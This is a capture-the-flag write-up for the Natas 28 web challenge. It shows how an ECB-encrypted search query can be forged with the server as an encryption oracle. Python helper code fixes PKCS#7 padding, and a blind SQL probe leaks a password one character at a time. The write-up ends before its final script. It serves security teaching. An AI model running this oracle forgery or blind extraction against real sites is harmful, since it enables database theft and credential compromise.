No source code this time, so this will be fun. The program takes your query and searches a list of jokes for it, possibly stored in a database (the page calls itself a “whack computer joke database”).
Checking out the requests in Burp shows that my test query “the” is sent to the server and the response returns our query encoded, likely base64. This encoded query is then used in a redirect to “/search.php”.
It’s the “search.php” page that actually returns the results.
The output of base64 decoding isn’t quite what I expected, though: it looks random enough to be encrypted. Surely it’s either a homegrown encryption or one with known exploitable weaknesses.
I was thinking that maybe we don’t need to break the encryption to get meaningful results. Since there’s a hint that we’re querying a database, we can try SQL injection payloads and see what comes back. However, none of my attempts made any difference, not even ones that should have worked for a totally blind injection. So the input is probably escaped the way it should be.
Cryptanalysis
Given the hint that it’s a database lookup, maybe the rest of the SQL query is in our encrypted input too. If the entire SQL query is being sent here, we won’t need an injection flaw at all: after breaking the encryption, we would have complete control of the database.
I don’t know much about formal cryptanalysis, but I do know that one of its fundamental techniques is the known-plaintext attack, where the analyst knows or controls part of the original text (the plaintext) and makes inferences from how the ciphertext changes. (Strictly speaking, when we choose the input ourselves it’s a chosen-plaintext attack.) We know the word “the” is in the plaintext, and if there’s an entire SQL query, the “SELECT” keyword must be in there too.
To make analysis much easier, I wrote a bash script to fetch the query strings instead of using Burp every time and copying out the data I needed. It also uses another helper (Python) script I wrote called “urldecode”, but a solution for that is easy to find.
It just takes the first argument given and returns the encoded query string and its hex output. After trying different inputs with the helper script, it becomes pretty clear there is a header at the start of the ciphertext that never changes. The “SELECT” keyword is probably within that unchanging header.
Next, I tested successive input strings of increasing length, adding one character to the end each time (like “0123”, then “01234”):
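The bash script isn’t shown here, but its parsing step could be sketched in Python roughly as follows. This is a minimal sketch, not the original script: it assumes the redirect URL carries the ciphertext as percent-encoded base64 in a parameter named `query`, which matches what Burp showed but is an assumption about the exact format. `hex_blocks` prints one 16-byte block per line so the unchanging header is easy to spot.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def ciphertext_from_redirect(location: str) -> bytes:
    """Pull the encrypted query out of a redirect URL such as .../search.php?query=...

    Assumption: the token is base64 in a "query" parameter, and the server
    percent-encodes "+", "/" and "=" (a raw "+" would be read as a space).
    """
    params = parse_qs(urlsplit(location).query)
    token = params["query"][0]  # parse_qs percent-decodes the value for us
    return base64.b64decode(token)


def hex_blocks(ct: bytes, size: int = 16) -> str:
    """One line of hex per cipher block, so an unchanging header stands out."""
    return "\n".join(ct[i:i + size].hex() for i in range(0, len(ct), size))
```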
The ciphertext is in blocks of 16 bytes
The first 2 blocks are unchanging
The third block is different for successive inputs until it is 11 characters long
The fourth block is different for successive inputs until it is 26 characters long
The fifth block is different for successive inputs until it is 42 characters long
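These results show that the cipher works on 16-byte blocks in Electronic Codebook (ECB) mode: each block is encrypted independently, so a ciphertext block only changes when its own plaintext block changes. That should make known-plaintext attacks useful.
Long repetitive input strings make the ECB predictability easy to see, since repeated plaintext blocks produce repeated ciphertext blocks. That is exactly what we can exploit.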
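Comparing the ciphertexts of successive inputs block by block is what produced the observations above. A small helper for that comparison might look like this (a sketch; the function names are made up for illustration):

```python
def split_blocks(ct: bytes, size: int = 16) -> list[bytes]:
    """Split a ciphertext into fixed-size blocks."""
    if len(ct) % size:
        raise ValueError("ciphertext is not a whole number of blocks")
    return [ct[i:i + size] for i in range(0, len(ct), size)]


def changed_blocks(before: bytes, after: bytes, size: int = 16) -> list[int]:
    """Indices of blocks that differ between two ciphertexts.

    Blocks present in only the longer ciphertext count as changed.
    """
    a, b = split_blocks(before, size), split_blocks(after, size)
    diff = [i for i, (x, y) in enumerate(zip(a, b)) if x != y]
    diff += range(min(len(a), len(b)), max(len(a), len(b)))
    return diff
```

Feeding it the decoded ciphertexts for “0123” and “01234”, then “01234” and “012345”, and so on, shows which block indices move as the input grows.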
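One quick way to confirm ECB is to count repeated ciphertext blocks for a long run of identical characters: if identical 16-byte plaintext blocks encrypt to identical ciphertext blocks, the mode is almost certainly ECB. A hypothetical helper for that check:

```python
from collections import Counter


def repeated_blocks(ct: bytes, size: int = 16) -> dict[str, int]:
    """Map each ciphertext block (as hex) that appears more than once to its count."""
    counts = Counter(ct[i:i + size] for i in range(0, len(ct), size))
    return {blk.hex(): n for blk, n in counts.items() if n > 1}
```

For an input like 64 “A” characters, this should report the same block several times, while a non-ECB mode (for example CBC with a random IV) would show no repeats.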
Since the goal is to send our own crafted SQL statement encrypted with this system, we don’t have to figure out the encryption itself. We can simply use the server as an oracle that encrypts exactly what we want…
In practice, we send our SQL as input positioned so that it lands in the output starting at offset 30h (0x00000030). We then extract those bytes, which are the encrypted version of our SQL statement, and post them to “search.php”.
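Extracting the window is just a slice of the decoded ciphertext starting at 0x30. A sketch, assuming the payload has already been padded to a whole number of 16-byte blocks (`extract_window` is an illustrative name):

```python
WINDOW_START = 0x30  # byte offset where the 11th input character begins


def extract_window(ct: bytes, payload_len: int, block: int = 16) -> bytes:
    """Return the ciphertext blocks that encrypt a block-aligned payload."""
    if payload_len % block:
        raise ValueError("pad the payload to a multiple of the block size first")
    window = ct[WINDOW_START:WINDOW_START + payload_len]
    if len(window) != payload_len:
        raise ValueError("ciphertext too short for this payload")
    return window
```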
From the earlier observations of input lengths, we can deduce that our target 0x30 block (0x30 = 48, the start of the fourth 16-byte block) begins with the 11th input character. In other words, the first ten characters sent to the oracle don’t matter. But we need to make sure our input stays within the known window where the blocks are predictable, so we can cleanly extract what we want. One way to do that is to fill the remainder of the last block with dummy characters.
Like this… suppose the input is “000000000011111111111111111111111111111111”, which is made by the command python -c "print('0'*10 + '1'*16*2)". This gives us the first 10 useless characters as “0” and 32 payload characters as “1”, which results in two useful oracle blocks:
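Building the oracle input from a SQL payload comes down to two steps: prepend ten filler characters and pad the payload to a multiple of 16. A sketch, assuming spaces as the dummy padding (harmless if the SQL ends with a comment) and assuming the payload contains no characters the server escapes, since escaping would lengthen the plaintext and shift every later block:

```python
BLOCK = 16
FILLER_LEN = 10  # input chars that complete the third block (from the length tests)


def build_oracle_input(payload: str, filler: str = "0", pad: str = " ") -> str:
    """Prefix the throwaway filler, then pad the payload out to whole blocks."""
    payload += pad * (-len(payload) % BLOCK)  # 0..15 dummy chars
    return filler * FILLER_LEN + payload
```

With `"1" * 32` as the payload, no padding is needed and the result is the same 42-character test string used in the example that follows.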
Here’s a visualization of a SQL statement we could send and its relation to the oracle window (the “+” being a space in URL encoding):
This is what we have back:
And our oracle window:
The final result is the hex bytestring “de5b990ac1d04c6547da89610dc8680f39a7ae9df9901b5e334a484231dc3482”. To use it, it must be converted back into a base64 string (and URL-encoded, since base64 can contain “+”, “/” and “=”) before sending it to “/search.php”. The conversion can be done with echo "de5b990ac1d04c6547da89610dc8680f39a7ae9df9901b5e334a484231dc3482" | xxd -r -p | base64
However, sending the new query gives an error: “Incorrect amount of PKCS#7 padding for blocksize”.
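The same conversion in Python, with the URL-encoding step included (a sketch; `token_from_hex` is a made-up name):

```python
import base64
from urllib.parse import quote


def token_from_hex(hex_ct: str) -> str:
    """Hex ciphertext -> raw bytes -> base64 -> percent-encoded query value."""
    b64 = base64.b64encode(bytes.fromhex(hex_ct)).decode("ascii")
    return quote(b64, safe="")  # encode "+", "/" and "=" so they survive the URL
```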
Let’s see. PKCS #7 is described in RFC 5652 (Cryptographic Message Syntax).
The padding scheme itself is given in section 6.3, Content-encryption Process. It essentially says: append as many bytes as needed to fill the block size (but at least one), each having the padding length as its value.
Thus, the last decrypted byte tells us how many bytes to strip off. (One could also check that they all have the same value.)
So the problem isn’t the length of what we send but how it ends: our window stops at the end of our SQL payload, and that final block doesn’t decrypt to valid padding, because the padding lives in the final block of the original ciphertext.
To fix this, we send the window together with the rest of the original encrypted query (the blocks after the window, whose last block carries valid padding) instead of just the middle window part. To make that work with the SQL we want to execute, add a comment character (“#”) at the end of the SQL so that whatever the trailing blocks decrypt to is ignored.
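The padding rule and the check described above fit in a few lines. This is a sketch of standard PKCS#7, not the server’s code; the unpad error message simply mirrors the one the server returned:

```python
def pkcs7_pad(data: bytes, block: int = 16) -> bytes:
    """Append n bytes of value n; n is 1..block, so aligned data gets a full block."""
    n = block - len(data) % block
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes, block: int = 16) -> bytes:
    """Strip padding, rejecting anything that isn't valid PKCS#7."""
    if not data or len(data) % block:
        raise ValueError("length is not a multiple of the block size")
    n = data[-1]  # the last byte says how many bytes to strip
    if not 1 <= n <= block or data[-n:] != bytes([n]) * n:
        raise ValueError("Incorrect amount of PKCS#7 padding for blocksize")
    return data[:-n]
```

A window ending in a space (0x20 = 32) fails the `n <= block` check, which is consistent with the error we saw.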
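In code, the fix amounts to keeping our SQL window followed by the original tail. A sketch, assuming the tail is taken from the same oracle response as the window (`forge_ciphertext` is hypothetical):

```python
WINDOW_START = 0x30  # first byte of the block our SQL starts in


def forge_ciphertext(ct: bytes, payload_len: int, block: int = 16) -> bytes:
    """Return our SQL window followed by the original tail from the same response.

    The tail's last block decrypts to valid PKCS#7 padding, so the server's
    check passes; the trailing "#" in our SQL comments out whatever else
    the tail decrypts to.
    """
    if payload_len % block or len(ct) % block:
        raise ValueError("lengths must be whole blocks")
    window = ct[WINDOW_START:WINDOW_START + payload_len]
    tail = ct[WINDOW_START + payload_len:]
    if len(window) != payload_len or not tail:
        raise ValueError("ciphertext too short: no padded tail to reuse")
    return window + tail
```

Since window and tail come from one response, this is the same as dropping the header blocks before 0x30; splitting it out just makes the two parts explicit.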
The corrected data should look like this:
And the result in Burp:
Awesome! We have jokes!
SQL
Now that we can query the joke database with our own SQL code, the next objective is to extract the password for natas29.
To make this easier, I extended the helper script:
The script takes the SQL query we want and returns the output from “search.php”. No intermediary steps needed =).
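The modified script isn’t reproduced here. A rough Python equivalent of the whole pipeline might look like the sketch below. Several details are assumptions rather than facts from this write-up: the target URL, the placeholder credentials, the form field name `query`, that the redirect is a plain HTTP redirect urllib can follow, and the `search.php?query=` path. The oracle is a parameter so the offset logic can be tried without the network.

```python
import base64
import urllib.parse
import urllib.request
from typing import Callable

BASE_URL = "http://natas28.natas.labs.overthewire.org"  # assumed target
USER, PASSWORD = "natas28", "CHANGE_ME"                 # placeholder credentials
WINDOW_START, FILLER_LEN, BLOCK = 0x30, 10, 16


def _open(url, data=None):
    """urlopen with HTTP basic auth; urllib should carry the header to the same-host redirect."""
    req = urllib.request.Request(url, data=data)
    cred = base64.b64encode(f"{USER}:{PASSWORD}".encode()).decode()
    req.add_header("Authorization", "Basic " + cred)
    return urllib.request.urlopen(req)


def encrypt_via_server(plaintext: str) -> bytes:
    """POST the form and read the ciphertext out of the URL we get redirected to."""
    body = urllib.parse.urlencode({"query": plaintext}).encode()  # field name assumed
    with _open(BASE_URL + "/", body) as resp:
        final_url = resp.geturl()
    token = urllib.parse.parse_qs(urllib.parse.urlsplit(final_url).query)["query"][0]
    return base64.b64decode(token)


def forged_token(sql: str, oracle: Callable[[str], bytes] = encrypt_via_server) -> str:
    """Encrypt `sql` via the oracle and keep everything from offset 0x30 onward."""
    sql += " " * (-len(sql) % BLOCK)  # pad payload to whole blocks
    ct = oracle("0" * FILLER_LEN + sql)
    forged = ct[WINDOW_START:]        # our window + the correctly padded tail
    return urllib.parse.quote(base64.b64encode(forged).decode(), safe="")


def search(sql: str, oracle: Callable[[str], bytes] = encrypt_via_server) -> str:
    """Run our own SQL through search.php and return the HTML."""
    url = BASE_URL + "/search.php?query=" + forged_token(sql, oracle)  # path assumed
    with _open(url) as resp:
        return resp.read().decode(errors="replace")
```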
I then experimented with SQL commands to find a way to extract the password, and settled on running 'select * from jokes where ascii(substring((select password from users) from %d for 1))=%d #' % (i, ord(c)) in a loop. That tests one character at a time: if the guess is right, jokes are sent back in the response; otherwise, no jokes.
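The per-character test and the loop around it could be sketched like this. It’s not the author’s script: `probe` stands for any function that runs the SQL and reports whether jokes came back, and the 32-character alphanumeric password alphabet is an assumption. Comparing `ascii()` values presumably keeps the test case-sensitive, which a plain string comparison under MySQL’s usual case-insensitive collations would not.

```python
import string
from typing import Callable

PROBE = ("select * from jokes where "
         "ascii(substring((select password from users) from %d for 1))=%d #")
CHARSET = string.ascii_letters + string.digits  # assumed password alphabet
LENGTH = 32                                      # assumed password length


def probe_sql(position: int, char: str) -> str:
    """SQL that returns jokes only if password[position] (1-based) equals char."""
    return PROBE % (position, ord(char))


def recover_password(probe: Callable[[int, str], bool],
                     length: int = LENGTH, charset: str = CHARSET) -> str:
    """Try every candidate at each position; probe(i, c) is True when jokes come back."""
    found = []
    for i in range(1, length + 1):  # SQL substring positions start at 1
        for c in charset:
            if probe(i, c):
                found.append(c)
                break
        else:  # no candidate matched: wrong alphabet, length, or probe
            raise RuntimeError(f"no match at position {i}")
    return "".join(found)
```

Wiring it up might look like `recover_password(lambda i, c: MARKER in run_sql(probe_sql(i, c)))`, where `run_sql` is a hypothetical function returning the search.php HTML and `MARKER` is some fragment that only appears when jokes are listed (check a real response in Burp). Testing one character at a time costs up to 62 requests per position; a binary search using `>` instead of `=` would cut that to about six.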
There’s just no way you’re going to want to do this manually, so here’s my python script for it: